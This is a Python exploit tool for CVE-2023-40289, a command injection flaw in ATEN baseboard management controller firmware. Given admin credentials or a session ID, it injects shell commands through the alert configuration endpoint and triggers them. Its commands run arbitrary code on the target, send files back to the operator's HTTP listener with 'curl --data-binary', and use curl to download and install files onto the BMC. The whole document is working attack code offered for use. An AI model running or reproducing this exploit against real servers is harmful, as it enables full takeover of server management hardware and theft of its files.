README.md
Rendering markdown...
#!/usr/bin/env python3
"""
Exploit for CVE-2023-40289, a command injection vulnerability in ATEN's BMC firmware.
Based on information and code from https://binarly.io/advisories/BRLY-2023-001/
"""
import queue
import re
import stat
import sys
import threading
import time
import typing as t
from dataclasses import dataclass
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path, PurePosixPath
import click
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
@dataclass
class CliArgs:
target: str
lhost: str
lport: int
delay: int | float
class Handler(BaseHTTPRequestHandler):
    """Minimal request handler for the one-shot callback server.

    The owning server object is expected to carry two extra attributes:
    ``static_content`` (bytes returned for every GET request) and ``q`` (a
    queue that receives the body of every POST request).
    """

    def do_GET(self):
        """Handle an HTTP GET request by returning the server's static content."""
        self.send_response(200)  # OK
        self.send_header("Content-Type", "application/octet-stream")
        self.end_headers()
        self.wfile.write(self.server.static_content)

    def do_POST(self):
        """Handle an HTTP POST request by storing its body in the server's queue."""
        # A missing Content-Length header is treated as an empty body.
        content_length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(content_length)
        self.send_response(202)  # Accepted
        self.end_headers()
        # Hand the body over only after the response has been sent.
        self.server.q.put(body)

    def log_message(self, *args):
        """Discard request log output (send_response would otherwise log every request)."""
def run_http_server(static_content: bytes = b"") -> tuple[threading.Thread, "queue.Queue[bytes]"]:
    """Run an HTTP server in a background thread.

    This server only accepts a single request and terminates after handling it.
    The listening socket is closed once that request has been handled, so a
    later call can bind the same port again.

    Args:
        static_content: Static content to serve for GET requests.

    Returns:
        A tuple consisting of the background thread and a Queue from which the content of a
        POST request can be read.
    """
    server = HTTPServer(("", args.lport), Handler)

    # Attach a queue for communicating data back to the main thread.
    q: queue.Queue[bytes] = queue.Queue()
    server.q = q

    # Attach some static content to serve to GET requests.
    server.static_content = static_content

    def serve_once() -> None:
        # Handle exactly one request, then always release the listening socket.
        try:
            server.handle_request()
        finally:
            server.server_close()

    # Run the HTTP server in a daemon thread so it never keeps the process alive.
    thread = threading.Thread(target=serve_once, daemon=True)
    thread.start()
    return thread, q
def store_payload(payload: str, index: int = 0):
    """Write the payload command into one of the target BMC's alert slots.

    The command is placed in the alert's mail field. It is prefixed with ``;``
    (and with ``@`` if it contains none) and terminated with ``;:`` before
    being posted to the target.

    Args:
        payload: The command to run on the target BMC.
        index: Store the command at this alert index.

    Raises:
        ValueError: The payload is too long.
        RuntimeError: The target did not accept the payload.
    """
    if payload[:1] != ";":
        payload = ";" + payload

    # The target only accepts the value if an @ appears somewhere in it. The
    # extra character costs payload space, so it is added only when missing.
    if payload.find("@") == -1:
        payload = "@" + payload

    if len(payload) > 63:
        raise ValueError(
            f"Payload too long ({len(payload)} chars). A maximum of 63 character is allowed. Sorry."
        )

    # Terminate the command. The terminator is deliberately added after the
    # length check; exceeding the limit by it does not seem to hurt.
    payload = f"{payload};:"

    form = dict(
        op="config_alert",
        destination="192.168.0.10",
        severity="16",
        mail=payload,
        sub="test",
        msg="test",
        index=str(index),
        fun="m",
    )
    r = session.post(url, data=form, verify=False)
    if r.status_code == 200:
        return
    raise RuntimeError(
        f"Could not store payload {payload} at index {index}. Target returned {r.status_code} ({r.reason})."
    )
def trigger_exploit(index: int = 0) -> None:
    """Ask the target to send a test alert, which runs the command stored at that index.

    Args:
        index: Trigger the command stored at this alert index.

    Raises:
        RuntimeError: The target BMC returned an unexpected error.
    """
    r = session.post(
        url,
        data={"op": "send_test_alert", "index": str(index)},
        verify=False,
    )
    if r.status_code == 200:
        return
    raise RuntimeError(
        f"Could not trigger exploit at index {index}. Target returned {r.status_code} ({r.reason})."
    )
def get_file(path: str | PurePosixPath, timeout: int = 15, index: int = 1) -> bytes:
    """Get the file at the given path from the BMC by triggering an upload to a local handler.

    Args:
        path: Absolute path of the file on the target BMC to get.
        timeout: How long to wait for the upload to complete (in seconds).
        index: Store the upload command at this alert index.

    Returns:
        The file's contents.

    Raises:
        RuntimeError: Waiting for the file upload timed out, or the local
            server handled a request that did not carry an upload.
    """
    # Start listening before the BMC is told to connect back.
    thread, q = run_http_server()

    # Send the file to our HTTP server.
    store_payload(f"curl --data-binary @{path} {handler_url}", index=index)
    time.sleep(0.1)
    trigger_exploit(index=index)

    # Wait for the HTTP server to finish handling its single request.
    thread.join(timeout)
    if thread.is_alive():
        raise RuntimeError(f"Timed out after {timeout} seconds waiting for upload of {path}.")

    # The server thread has finished, so a POST body, if any, is already queued.
    # A blocking get() would hang forever if the request was not a POST.
    try:
        return q.get_nowait()
    except queue.Empty as exc:
        raise RuntimeError(f"The local HTTP server did not receive an upload of {path}.") from exc
def login(username: str, password: str) -> None:
    """Authenticate the global session against the target BMC's login endpoint.

    Args:
        username: Log in as this user.
        password: The password for the given user.

    Raises:
        requests.ConnectionError: Could not connect to the target BMC.
        requests.HTTPError: The target BMC returned an unexpected response.
    """
    login_url = f"{args.target}/cgi/login.cgi"
    credentials = {"name": username, "pwd": password}
    response = session.post(login_url, credentials, verify=False)
    response.raise_for_status()
def set_csrf_token() -> None:
    """Get the current CSRF token value and add it to the global session object.

    The token is read from the ``SmcCsrfInsert("CSRF_TOKEN", "...")`` call in
    the top menu page and stored as the session's ``Csrf_token`` header.

    Raises:
        requests.HTTPError: The target BMC returned an unexpected response.
        RuntimeError: The response did not contain a CSRF token.
    """
    r = session.get(f"{args.target}/cgi/url_redirect.cgi?url_name=topmenu", verify=False)
    r.raise_for_status()
    m = re.search(r'SmcCsrfInsert\s*\("CSRF_TOKEN",\s*"([^"]+)"\);', r.text)
    if m is None:
        # Fail with a clear message instead of an AttributeError on None.
        raise RuntimeError(
            "Could not find a CSRF token in the target's response. "
            "The session may not be authenticated."
        )
    session.headers["Csrf_token"] = m.group(1)
def _disable_password_prompt(ctx: click.Context, param: click.Parameter, value: t.Any) -> t.Any:
    """Click callback that switches off the interactive --password prompt.

    When the option this callback is attached to has a truthy value, the
    prompt of the command's ``password`` option is cleared so that click does
    not ask for a password.

    Args:
        ctx: The current click Context.
        param: The current click Parameter.
        value: The current click parameter's value.

    Returns:
        The unchanged value.
    """
    if not value:
        return value

    password_options = (
        option
        for option in ctx.command.params
        if isinstance(option, click.Option) and option.name == "password"
    )
    for option in password_options:
        option.prompt = None
    return value
@click.group(
    # Every option may also be supplied as an environment variable prefixed with BMC_.
    context_settings={"auto_envvar_prefix": "BMC"},
    no_args_is_help=True,
    help=r"""Exploit CVE-2023-40289 on BMCs with ATEN firmware.
/!\ Caution! This script will overwrite alerts without prompting! /!\ """,
    epilog="Note: All options may also be given as environment variables with the prefix 'BMC_' (e.g. BMC_TARGET).",
)
@click.option("--target", required=True, help="URL of the target BMC's web UI.")
@click.option(
    "-h",
    "--lhost",
    help="IP address or host name of this system to get payload output. Limited to ~35 characters.",
)
@click.option(
    "-l",
    "--lport",
    default=80,
    type=click.INT,
    help="Local port to run an HTTP server on to get payload output.",
    show_default=True,
)
@click.option(
    "-s",
    "--sid",
    help="A valid session ID for an administrative user on the target system.",
    # A given session ID makes the password unnecessary, so the callback
    # clears the --password prompt.
    callback=_disable_password_prompt,
)
@click.option(
    "-u",
    "--username",
    help="The name of an administrative user to log in as. Ignored if --sid is given.",
)
@click.option(
    "-p",
    "--password",
    prompt=True,
    hide_input=True,
    help="The password of the given user.",
)
@click.option(
    "--delay",
    type=click.FLOAT,
    default=1.5,
    show_default=True,
    help="Delay between running a command and retrieving its output.",
)
def cli(
    target: str,
    lhost: str | None,
    lport: int,
    sid: str | None,
    username: str | None,
    password: str | None,
    delay: float,
) -> None:
    # Group callback: publishes the shared options as module globals,
    # authenticates the global session and fetches the CSRF token.
    # Raises click.UsageError when neither a session ID nor a
    # username/password pair is available.

    # Store global CLI arguments for subcommands.
    global args
    args = CliArgs(target, lhost, lport, delay)
    # Set up some basic HTTP connection parameters.
    global url
    url = f"{target}/cgi/op.cgi"
    # Authenticate: reuse an existing session ID if given, otherwise log in.
    if sid:
        session.cookies.set("SID", sid)
    elif username and password:
        login(username, password)
    else:
        raise click.UsageError("Session ID or username and password is required.")
    set_csrf_token()
    session.headers["Referer"] = target
    # NOTE: handler_url is only assigned when --lhost was given; code that
    # reads it without --lhost will hit an unassigned global.
    if lhost:
        global handler_url
        # Note: We intentionally omit the URL scheme to save precious payload characters.
        # Curl will figure it out.
        handler_url = lhost
        # The port is only appended when it is not 80, again to save characters.
        if lport != 80:
            handler_url = f"{handler_url}:{lport}"
@cli.command(context_settings={"ignore_unknown_options": True})
@click.argument("payload", nargs=-1, type=click.UNPROCESSED)
def run(payload: tuple[str, ...]):
    """Run the PAYLOAD command on the target BMC. PAYLOAD is limited to ~61 characters."""
    # NOTE: the docstring above doubles as this subcommand's --help text.
    #
    # click passes the variadic PAYLOAD argument as a tuple of words; join
    # them back into a single command line.
    command = " ".join(payload)
    if not command:
        # Do not overwrite an alert on the target with an empty command.
        raise click.UsageError("No payload command given.")

    get_output = False
    if args.lhost is None:
        print("[!] Local host address not given. You will not get the output.", file=sys.stderr)
    elif len(command) < 53:
        # Looks like the payload is short enough. We'll redirect the output to a file so we
        # can get it later.
        command += "&>/tmp/x"
        get_output = True
    elif len(command) < 54:
        # Get stdout only. Better than nothing.
        command += ">/tmp/x"
        get_output = True
    else:
        # For a long payload, we can't redirect the output, because that would bring the payload
        # over the 63 character length limit.
        print("[!] Payload is too long. You will not get the output.", file=sys.stderr)

    # Run the payload.
    store_payload(command)
    print("[✓] Set payload command", file=sys.stderr)
    time.sleep(0.1)
    trigger_exploit()
    print("[✓] Triggered payload command", file=sys.stderr)

    if not get_output:
        return

    # Retrieve the output after giving the command time to finish.
    time.sleep(args.delay)
    print("[.] Getting command output", file=sys.stderr)
    try:
        output = get_file("/tmp/x")
    except RuntimeError:
        print("[!] Could not get command output.", file=sys.stderr)
        return

    if output:
        try:
            # Print the output as text.
            print(output.decode(), end="")
        except UnicodeDecodeError:
            # Output is not valid UTF-8. It's probably binary data then. Output it raw.
            sys.stdout.buffer.write(output)
            sys.stdout.buffer.flush()
@cli.command()
@click.option(
    "--dest",
    default=Path("."),
    type=click.Path(path_type=Path),
    help="Local destination directory in which to store the file.",
)
@click.option(
    "--flat/--no-flat",
    default=False,
    help="Do not/do replicate the original directory structure in the destination directory.",
)
@click.argument("path", type=click.Path(path_type=PurePosixPath))
def get(path: PurePosixPath, dest: Path, flat: bool) -> int:
    """Get PATH from the target BMC and save it locally."""
    # NOTE: the docstring above doubles as this subcommand's --help text.
    #
    # The BMC uploads the file to this machine, so a callback address is
    # mandatory. Without --lhost the global handler_url is never assigned.
    if not args.lhost:
        raise click.UsageError("--lhost is required to receive the file from the BMC.")

    print(f"[.] Triggering upload of {path} from BMC.", file=sys.stderr)
    try:
        content = get_file(path)
    except RuntimeError:
        print("[!] Could not get file.", file=sys.stderr)
        return 1

    if not flat:
        # Mirror the remote directory below dest. Stripping the path's own
        # anchor (rather than a hard-coded "/") also works for a relative PATH.
        dest = dest / path.parent.relative_to(path.anchor)
    dest.mkdir(parents=True, exist_ok=True)
    dest = dest / path.name
    dest.write_bytes(content)
    print(f"[✓] File contents written to {dest}.", file=sys.stderr)
    return 0
def _run_put_step(index: int, failure: str, success: str) -> None:
    """Trigger the command stored at alert *index* and report whether it succeeded.

    The stored commands redirect their output to /tmp/x on the BMC. That file
    is fetched afterwards (using alert index 3 for the upload command), and any
    content in it is treated as an error message.

    Args:
        index: Alert index of the previously stored command to trigger.
        failure: Message to print if the command produced output.
        success: Message to print if the command produced no output.
    """
    trigger_exploit(index=index)
    time.sleep(args.delay)
    try:
        output = get_file("/tmp/x", index=3)
    except RuntimeError:
        print("[!] Could not get command output.", file=sys.stderr)
        return
    if output:
        print(failure, file=sys.stderr)
        # Error text from the BMC may not be valid UTF-8; never crash on it.
        print(output.decode(errors="replace"), end="", file=sys.stderr)
    else:
        print(success, file=sys.stderr)


@cli.command()
@click.argument("file", type=click.Path(exists=True, dir_okay=False, path_type=Path))
@click.argument("dest", type=click.Path(path_type=PurePosixPath))
def put(file: Path, dest: PurePosixPath) -> int:
    """Write local FILE to the BMC at DEST. Will restore local permissions on the target."""
    # NOTE: the docstring above doubles as this subcommand's --help text.
    #
    # The BMC downloads the file from this machine, so a callback address is
    # mandatory. Without --lhost the global handler_url is never assigned.
    if not args.lhost:
        raise click.UsageError("--lhost is required so the BMC can download the file.")

    content = file.read_bytes()
    mode = stat.S_IMODE(file.stat().st_mode)
    # The chmod step is skipped when the local mode is already 0o644.
    needs_chmod = mode != 0o644

    # Store one command per alert slot: download (0), chmod (1), move (2).
    store_payload(f"curl -o /tmp/dl {handler_url} &>/tmp/x", index=0)
    if needs_chmod:
        store_payload(f"chmod {mode:o} /tmp/dl &>/tmp/x", index=1)
    store_payload(f"mv /tmp/dl {dest} &>/tmp/x", index=2)
    print("[✓] Set download payloads", file=sys.stderr)
    time.sleep(0.1)

    # Serve the file content, then make the BMC download it.
    thread, q = run_http_server(content)
    trigger_exploit(index=0)

    # Wait for the HTTP server to finish handling its single request.
    thread.join(15)
    if thread.is_alive():
        print("[!] BMC did not download file.", file=sys.stderr)
        return 1
    print(f"[✓] Downloaded {file} to BMC.", file=sys.stderr)

    if needs_chmod:
        _run_put_step(
            1,
            failure="[!] Could not set file mode.",
            success="[✓] Set file mode.",
        )

    _run_put_step(
        2,
        failure=f"[!] Could not move downloaded file to {dest} on BMC.",
        success=f"[✓] Moved downloaded file to {dest} on BMC.",
    )
    return 0
# Define some global variables used throughout this script.
# Shared command-line options; assigned by cli().
args: CliArgs
# URL of the target's op.cgi endpoint that all payload requests are posted to; assigned by cli().
url: str
# HTTP session shared by all requests; cli() adds the SID cookie (or logs in)
# and the Csrf_token and Referer headers.
session = requests.Session()
# Callback address (host, plus ":port" unless the port is 80, without a URL
# scheme) embedded in payloads; only assigned by cli() when --lhost is given.
handler_url: str
# Script entry point: hand control to the click command group.
if __name__ == "__main__":
    cli()